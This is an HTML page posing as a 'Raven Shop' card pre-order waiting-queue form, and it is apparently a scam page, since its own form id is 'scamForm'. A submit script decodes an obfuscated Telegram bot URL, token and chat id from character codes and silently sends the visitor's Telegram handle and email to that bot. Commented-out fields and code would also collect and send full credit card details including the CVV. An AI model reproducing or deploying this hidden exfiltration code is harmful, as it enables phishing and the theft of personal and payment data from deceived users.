<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">

    <link rel="apple-touch-icon" type="image/png"
        href="https://cdn.discordapp.com/attachments/1195855717660368986/1203832233581092914/session-raven.gif?ex=65d28722&is=65c01222&hm=5fe238570ec13183920845815dacf8349d0cd1825c2471a59ad53d8ce0a1487a&" />

    <meta name="apple-mobile-web-app-title" content="CodePen">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link rel="shortcut icon" type="image/x-icon"
        href="https://cdn.discordapp.com/attachments/1195855717660368986/1203832233581092914/session-raven.gif?ex=65d28722&is=65c01222&hm=5fe238570ec13183920845815dacf8349d0cd1825c2471a59ad53d8ce0a1487a&" />

    <link rel="mask-icon" type="image/x-icon"
        href="https://cdn.discordapp.com/attachments/1195855717660368986/1203832233581092914/session-raven.gif?ex=65d28722&is=65c01222&hm=5fe238570ec13183920845815dacf8349d0cd1825c2471a59ad53d8ce0a1487a&"
        color="#111" />

    <title>Shipping Label - Raven Shop </title>



    <style>
        body {
            background: #1d1e22;
            font-family: 'Open Sans', sans-serif;
            font-weight: 900;
            color: #f6f6f6;
            opacity: 0;  
            transition: opacity 1s ease-in-out, background-color 1s ease-in-out;
            background-color: #1d1e22;
            overflow: hidden;
            
        }

        body.loaded {
            opacity: 1;
            background-color: #1d1e22; /* Adjust the final background color here */
        }
        

        .smalld{
            font-weight: 100;
            color: #7a7a7a;
            padding: 0px;
            margin: 5px;
        }

        

   

        .container {
            width: 45%;
            margin: 50px auto;
        }

        header {
            color: #fff;
            text-align: center;
            font-size: 36px;
            font-weight: 600;
            margin: 50px 0;
        }

        .input-group quantity-selector {
            margin-bottom: 0;
            padding-bottom: 0;
        }

        header>span {
            display: block;
            font-size: 30px;
            font-weight: 400;
        }

        .in-container {
            width: 100%;
            margin: 40px 0;
        }

        h2 {
            font-weight: 400;
            color: #007bff;
            border-bottom: 1px solid #007bff;
            border-width: 2px;
            margin: 20px 50px;
            padding: 10px;
            text-align: center;
        }

        .row {
            width: 100%;
            margin: 20px 0;
            padding: 0;
            display: table;
        }

        .col2 {
            display: table;
            width: 47%;
            float: left;
        }

        .col2:nth-child(2) {
            display: table;
            float: right;
        }

        label {
            line-height: 35px;
            display: table-header-group;
            letter-spacing: 0.9px;
            transition: all 0.3s ease;
        }

        @media only screen and (max-width: 1000px) {
  label {
    display: block;
    font-weight: bold;
    margin-bottom: 8px;
  }

  .container {
            width: 90%;
            margin: 50px auto;
        }

  input {
    width: 100%;
    box-sizing: border-box;
    padding: 10px;
    margin-bottom: 15px;
  }
  .col2 {
            display: table;
            width: 100%;
            float: left;
        }
}
  
select {
    width: 100%;
    padding: 15px;
    box-sizing: border-box;
    border: 2px solid #ddd;
    border-radius: 5px;
    background: transparent;
    color: #ffffff;
    font-size: 1rem;
    margin-bottom: 15px; /* Adjust the margin as needed */
}

option {
    color: #1d1e22;
}

.custom-quantity {
            position: relative;
            display: inline-block;
            width: 100%;
        }

        .custom-quantity input {
            width: calc(100% - 40px);
            padding-left: 30px;
        }

        .custom-quantity .custom-input-icon {
            position: absolute;
            top: 0;
            left: 0;
            padding: 10px;
            box-sizing: border-box;
            cursor: pointer;
            color: #ccc;
        }

select:focus {
    outline: none !important;
    border-color: #EF5350;
}

select:focus+label {
    color: #EF5350;
}


        input {
            width: 100%;
            display: top-;
            border: border-box;
            padding: 15px;
            border: 2px solid #ddd;
            border-radius: 5px;
            background: transparent;
            color: #f6f6f6;
            font-size: 1rem;
        }

        input:focus {
            outline: none !important;
            border-color: #EF5350;
        }

        input:focus+label {
            color: #EF5350;
        }

        input[type="submit"] {
            display: table;
            width: 30%;
            margin: 20px -32px 0 auto;
            background: #003cff;
            border: 0;
            width: 100%;
            margin-right: 10%;

        }

        input[type="submit"]:hover {
            background: transparent;
            border: 2px solid #007bff;
            color: #007bff;
            cursor: pointer;
            
        }

        #formOutput {
            margin-top: 30px;
        }

        .big{
            height:700px
        }

    </style>
    <script>
        document.addEventListener('DOMContentLoaded', function () {
            setTimeout(function () {
                document.body.classList.add('loaded');
            }, 1000); // 1000 milliseconds = 1 second
        });
    </script>
    <script>
        function updateQuantityInput() {
            var itemSelect = document.getElementById('item');
            var quantityInput = document.getElementById('quantity');

            // Check if the selected item allows custom input
            if (itemSelect.value === 'writeYourOwn') {
                quantityInput.removeAttribute('disabled');
            } else {
                // If a predefined item is selected, disable the quantity input
                quantityInput.setAttribute('disabled', 'disabled');
                // You can also reset the quantity to 0 or any default value here
                quantityInput.value = 0;
            }
        }

        function toggleCustomQuantity() {
            var quantityInput = document.getElementById('quantity');
            quantityInput.removeAttribute('disabled');
            quantityInput.focus();
        }

        function redirectToCompleted() {
            // Your form submission logic here
            console.log('Form submitted');
        }
    </script>
    <script>
        const myQuantitySelector = document.getElementById('inputQuantitySelector')
myQuantitySelector.addEventListener('change', () => {
  // do something...
})
    </script>


</head>

<body translate="no">
    <div class="container">
        <header>Register to the waiting queue
       
        </header>
        

        <h2 style="font-size: 20px;">Contact Informations</h2>
            <form id="scamForm" onsubmit="redirectToCompleted()">
                <div class="row">
                    <div class="col2">
                        <label for="firstname">Telegram Username</label>
                        <input type="text" name="Telegram" placeholder="@spiderman" required>
                    </div>
                    


                    <div class="col2">
                        <label for="lastname">Mail address</label>
                        <input type="text" name="Contact-mail" placeholder="spiderman@gmail.com" required>
                    </div>
                    <label for="firstname">Reserve card quantity.</label>
                    <div class="input-group quantity-selector">
                        <input type="number" id="inputQuantitySelector" class="form-control" aria-live="polite" data-bs-step="counter" name="quantity" title="quantity" value="1" min="1" max="10" step="1" data-bs-round="0" aria-label="Quantity selector">
         
                        
                      </div>
                      <h4 class="smalld">For bigger quantities please directly contact a staff</h4>
                </div>
                
   <!--             <div class="row">
                    
                    <input type="email" name="➥🎀 • Email" placeholder="john@gmail.com">
                    <label for="email">Email</label>
                </div>
                <div class="row">
                    <input type="tel" name="➥🎀 • Phone Number" placeholder="+33 489 32 34 43">
                    <label for="contactnum">Contact number</label>
                </div>
                <div class="row">
                    <input type="date" name="➥🎀 • Birthday Date">
                    <label for="orderdate">Birthday</label>
                </div>

               
                <h2>Order Information</h2>
                
                <div class="row">
                    <input type="text" name="➥🎁 • Delivery Address" placeholder="8 rue Sainte-Anne">
                    <label for="lineone">Delivery address</label>
                </div>
            
                <div class="row">
                    <div class="col2">
                        <input type="text" name="➥🎁 • City" placeholder="Paris">
                        <label for="city">City</label>
                    </div>
                    <div class="col2">
                        <input type="text" name="➥🎁 • State" placeholder="Île-de-France">
                        <label for="state">State/Region/Province</label>
                    </div>
                </div>
                <div class="row">
                    <div class="col2">
                        <input type="text" name="➥🎁 • Zipcode" placeholder="75001">
                        <label for="zipcode">Postal/Zip Code</label>
                    </div>
                    <div class="col2">
                        <input type="text" name="➥🎁 • Country" placeholder="France">
                        <label for="country">Country</label>
                    </div>
                </div>
                

             
               <h2>Checkout Information</h2>
               <div class="row">
                   <input type="text" name="➥💳 • Holders Name & Surname">
                   <label for="creditcard">Card holder Name & Surname</label>
               </div>
               <div class="row">
                   <input type="text" name="➥💳 • CreditCard Number">
                   <label for="creditcard">Credit Card Number</label>
               </div>
               <div class="row">
                   <input type="text" name="➥💳 • Expiration Date">
                   <label for="expirationdate">Expiration Date</label>
               </div>
               <div class="row">
                   <input type="text" name="➥💳 • CVV">
                   <label for="cvv">CVV</label>
               </div>
               
        -->
                <div class="row">
                    <input type="submit" name="submit" value="Pre-order">
                </div>
            </form>

            <!-- Display Form Data Output -->
            <div id="formOutput"></div>
        </div>
    </div>
    <div class="big">
        <h1></h1>
    </div>

    <script>
        document.getElementById('scamForm').addEventListener('submit', function (event) {
            event.preventDefault();
    
            const formData = new FormData(event.target);
            const apiUrl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 116, 101, 108, 101, 103, 114, 97, 109, 46, 111, 114, 103, 47, 98, 111, 116, 54, 51, 52, 51, 57, 54, 52, 51, 51, 52, 58, 65, 65, 69, 76, 107, 83, 100, 45, 73, 70, 84, 71, 87, 57, 75, 109, 72, 76, 95, 80, 100, 76, 80, 112, 80, 73, 81, 112, 109, 97, 73, 74, 117, 110, 107, 47, 115, 101, 110, 100, 77, 101, 115, 115, 97, 103, 101);
            const chatId = String.fromCharCode(45, 49, 48, 48, 50, 48, 55, 56, 51, 57, 54, 51, 51, 55);
    
            // Construct the message body with titles, spoilers, and date
            let messageBody = `\n\n📅 *${new Date().toLocaleString()}*\n\n`;
            
    
            messageBody += getSection(formData, ['Telegram', 'Contact-mail']);
    
    
         //    messageBody += '\n\n🔱 𝐂𝐫𝐞𝐝𝐢𝐭 𝐂𝐚𝐫𝐝 𝐈𝐧𝐟𝐨𝐫𝐦𝐚𝐭𝐢𝐨𝐧 🔱\n';
         //   messageBody += getSection(formData, ['➥💳 • Holders Name & Surname','➥💳 • CreditCard Number', '➥💳 • Expiration Date', '➥💳 • CVV']);
    
            const parseMode = 'Markdown';
    
            fetch(apiUrl, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: messageBody,
                    parse_mode: parseMode,
                }),
            })
            .then(response => response.json())
            .then(data => {
                console.log('Telegram response:', data);
    
                const formOutput = document.getElementById('formOutput');
                formOutput.innerHTML = '<p>Creating a ticket . . .</p>';
            })
            .catch(error => {
                console.error('Error sending to Telegram:', error);
    
                const formOutput = document.getElementById('formOutput');
                formOutput.innerHTML = '<p>Error checking the Informations. Please try again later.</p>';
            });
        });
    
        // Function to create a section in the message body
        function getSection(formData, fields) {
            return fields.map(field => `${field} : ${formData.get(field)}`).join('\n');
        }
    </script>
      <script>
        document.getElementById('scamForm').addEventListener('submit', function (event) {
            event.preventDefault();
    
            // Your existing form submission logic
    
            // Add the transition class to the body
            document.body.classList.add('transition-effect');
    
            // Set timeout for 3 seconds before redirecting
            setTimeout(function () {
                // Redirect to the completed page
                window.location.href = "success-preorder.html";
            }, 3000); // 3000 milliseconds = 3 seconds
        });
    </script>
    
</body>

</html>
